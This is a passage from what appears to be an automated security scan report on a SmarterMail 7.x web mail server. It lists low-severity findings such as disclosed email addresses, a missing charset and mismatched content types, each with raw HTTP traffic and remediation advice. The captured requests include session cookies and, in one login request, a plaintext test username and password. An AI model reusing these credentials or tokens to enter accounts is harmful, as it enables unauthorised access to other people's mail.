       <input name="ctl00$MPH$txtUserName" type="text" value="auser@hoytllc.com" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
...[SNIP]...

13.6. http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/frmAlert.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Alerts/frmAlert.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Main/Alerts/frmAlert.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:56 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45700
Connection: Close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Events - hoytllc.com - S
...[SNIP]...
<td class="Setting">euser@hoytllc.com</td>
...[SNIP]...

13.7. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Calendar/frmEvent.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Main/Calendar/frmEvent.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:58 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76205
Connection: Close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   My Calendar - hoytllc.co
...[SNIP]...
<input name="ctl00$MPH$txtEmailMe_SettingText" type="text" value="euser@hoytllc.com" id="ctl00_MPH_txtEmailMe_SettingText" class="text" style="width:300px;" />
...[SNIP]...

13.8. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Calendar/frmEvent.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Main/Calendar/frmEvent.aspx?popup=true HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: vulnerable.SmarterMail 7.x.host:9998
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:19:50 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 75949


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   My Calendar - hoytllc.co
...[SNIP]...
<input name="ctl00$MPH$txtEmailMe_SettingText" type="text" value="enduser@hoytllc.com" id="ctl00_MPH_txtEmailMe_SettingText" class="text" style="width:300px;" />
...[SNIP]...

13.9. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmAutocomplete.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmAutocomplete.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Main/frmAutocomplete.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:09 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12495
Connection: Close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Auto-complete - hoytllc.
...[SNIP]...
"urls":[]},{"uid":"global address list|fa30805e487b4352a362fff155e115ce","rowNumber":2,"d":false,"n":false,"columns":[{"v":"\u003cinput type=checkbox /\u003e","c":"showsel lc nw CheckBoxColumn"},{"v":"testme@hoytllc.com","c":"nw"},{"v":"testme","c":"nw leftpad"},{"v":"Global Address List","c":"rc nw leftpad"}],"urls":[]}],"checkedRows":[],"totalRows":3,"dirtyKey":"634215692908050000","labelText":null,"additionalJavas
...[SNIP]...

13.10. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmGAL.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmGAL.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Main/frmGAL.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:10 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16351
Connection: Close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Global Address List - ho
...[SNIP]...
<td class="rc leftpad">testme@hoytllc.com</td>
...[SNIP]...

13.11. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMySettings.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmMySettings.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Main/frmMySettings.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserSettings"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:21:34 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 56951


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Account Settings - hoytl
...[SNIP]...
<input name="ctl00$MPH$wucUserSettings$txtDisplayName_SettingText" type="text" value="enduser@hoytllc.com" id="ctl00_MPH_wucUserSettings_txtDisplayName_SettingText" class="text" />
...[SNIP]...

13.12. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserReports"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:21:29 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 27903


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.co
...[SNIP]...
<td class='ReportSubTitle'>(enduser@hoytllc.com)</td>
...[SNIP]...

13.13. http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/JavaScriptFlashGateway.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /SystemAdmin/JavaScriptFlashGateway.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /SystemAdmin/JavaScriptFlashGateway.js HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:17 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: public
ETag: "1CB60CF5B830100"
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 13392
Connection: Close

/*
Macromedia(r) Flash(r) JavaScript Integration Kit License


Copyright (c) 2005 Macromedia, inc. All rights reserved.

Redistribution and use in source and binary forms, with or without modifi
...[SNIP]...

--

This code is part of the Flash / JavaScript Integration Kit:
http://www.macromedia.com/go/flashjavascript/

Created by:

Christian Cantrell
http://weblogs.macromedia.com/cantrell/
mailto:cantrell@macromedia.com

Mike Chambers
http://weblogs.macromedia.com/mesh/
mailto:mesh@macromedia.com

Macromedia
*/

/**
* Create a new Exception object.
* name: The name of the exception.
* message: The exception message.
*/
function Exception(name, message)
{
if (name)

...[SNIP]...

13.14. http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/JavaScriptFlashGatewayHttps.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /SystemAdmin/JavaScriptFlashGatewayHttps.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /SystemAdmin/JavaScriptFlashGatewayHttps.js HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:17 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: public
ETag: "1CB60CF5B830100"
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 13394
Connection: Close

/*
Macromedia(r) Flash(r) JavaScript Integration Kit License


Copyright (c) 2005 Macromedia, inc. All rights reserved.

Redistribution and use in source and binary forms, with or without modifi
...[SNIP]...

--

This code is part of the Flash / JavaScript Integration Kit:
http://www.macromedia.com/go/flashjavascript/

Created by:

Christian Cantrell
http://weblogs.macromedia.com/cantrell/
mailto:cantrell@macromedia.com

Mike Chambers
http://weblogs.macromedia.com/mesh/
mailto:mesh@macromedia.com

Macromedia
*/

/**
* Create a new Exception object.
* name: The name of the exception.
* message: The exception message.
*/
function Exception(name, message)
{
if (name)

...[SNIP]...

14. HTML does not specify charset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /FileStorageUpload.ashx

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

POST /FileStorageUpload.ashx?uploadValidationToken=98dee8a7f3fc415c919a873e64836960&pathField=Root+Folder%5c&userField=euser&domainField=hoytllc.com&name=fastdial.net-netsparker.pdf&chunk=1&chunks=3&offset=102400&file_size=224593 HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/ThirdPartyComponents/plupload.flash_1_2_3.swf
content-type: application/octet-stream
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SelectedLanguage=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserStorage"}
Content-Length: 102400

.I^.cw!.%..J..%.|Q..X...[s .\r..%.r.\..OZ.q.4..:......A.>d.yRz....H.$..3s/.4.!.Y.2.9=..^.kr..*c.    8l.5.z.t.}[X........-.
.>..Wr..9...j.[......sXV$..9k.^r..Ir.DH...Y.g.....Cr.J....Q....Sr.^.r.9T....'...
...[SNIP]...

Response

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:11:42 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html
Connection: Close


</pre></table></table></table></table></table></font></font></font></font></font></i></i></i></i></i></b></b></b></b></b></u></u></u></u></u><p>&nbsp;</p><hr>

<html>
<head>
<title
...[SNIP]...

15. Content type incorrectly stated
There are 6 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


15.1. http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Default.aspx

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /Default.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx#
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserRSS"}
Content-Length: 1097

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24Split%24LP%24lnkUpdate&ctl00_Split_LP_ctl01_menuNotesSourceTitle_menuNotesSource_menuSourceSelf_CB=on&ctl00_Split_LP_ctl01_menuNotes_menuCNotesV
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:20:51 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 8851

3820|updatePanel|ctl00_Split_LP_StyledUpdatePanel1|
                   
<div class="PageTitle" id="SectionHeader">
   <div class="RoundedPageTitleLeft">
       <div class="RoundedPageTitleRight">
           <div id="SectionH
...[SNIP]...

15.2. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Login.aspx

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /Login.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; settings=; SelectedLanguage=; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}
Content-Length: 1287

ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7Cctl00%24BPH%24LoginImageButton&ctl00%24MPH%24txtUserName=auser%40hoytllc.com&ctl00%24MPH%24txtPassword=auser123&ctl00%24MPH%24chkAutoLogin=on&ctl00%24BPH%
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:28:43 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: SelectedLanguage=; expires=Thu, 01-Oct-2020 22:28:43 GMT; path=/
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 5508

3590|updatePanel|ctl00_UpdatePanel1|
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitle
...[SNIP]...

15.3. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Calendar/frmEvent.aspx

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /Main/Calendar/frmEvent.aspx?popup=true HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx?popup=true#
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}; ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55
Content-Length: 26574

ctl00%24ScriptManager1=ctl00%24MPH%24ctl00%7Cctl00%24MPH%24lnkRefresh&__LASTFOCUS=&__EVENTTARGET=ctl00%24MPH%24lnkRefresh&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTE5MDk3MzY0MA8WCh4IX19fVGl0bGUFC015IEN
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:27:52 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 68875

11|updatePanel|ctl00_UpdatePanel1|
               
           |29475|updatePanel|ctl00_MPH_ctl00|
           
<!-- HyperMultiPage -->
<div class='' id='ctl00_MPH_MP1'>
   <input type="hidden" name="ctl00$MPH$VisiblePage" id
...[SNIP]...

15.4. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmAddFileStorageFolder.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/frmAddFileStorageFolder.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /UserControls/Popups/frmAddFileStorageFolder.aspx?parent=Root+Folder%5c HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmAddFileStorageFolder.aspx?parent=Root+Folder%5c
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserStorage"}
Content-Length: 630

ctl00%24ScriptManager=ctl00%24ScriptManager%7Cctl00%24BrPH%24SaveButton&__LASTFOCUS=&__EVENTTARGET=ctl00%24BrPH%24SaveButton&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNjQzNzgwNTYzDxYGHghfX19UaXRsZQUGRm9s
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:58:51 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 3114

246|updatePanel|ctl00_UpdatePanel1|
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure"><img src="/App_Themes/Default/Images/Icons/TipText/Failure.gif" alt=""/
...[SNIP]...

15.5. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/frmDeviceSync.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /UserControls/Popups/frmDeviceSync.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=
Content-Length: 17133

ctl00%24ScriptManager=ctl00%24ScriptManager%7Cctl00%24BPH%24chkShowAtLogin&__EVENTTARGET=ctl00%24BPH%24chkShowAtLogin&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTkxNjAzNDgyNg8WBB4QX19fUmVzdW
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:58:39 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 25908

11|updatePanel|ctl00_UpdatePanel1|
               
           |3645|updatePanel|ctl00_MPH_splitter1_paneMobileDescription_UpdatePanel1|
                           <div class='DeviceWrapper'><div class='DeviceName'>Apple iPod and iPhone<
...[SNIP]...

15.6. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/ThirdPartyComponents/PluploadReceiver.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/ThirdPartyComponents/PluploadReceiver.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /UserControls/ThirdPartyComponents/PluploadReceiver.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
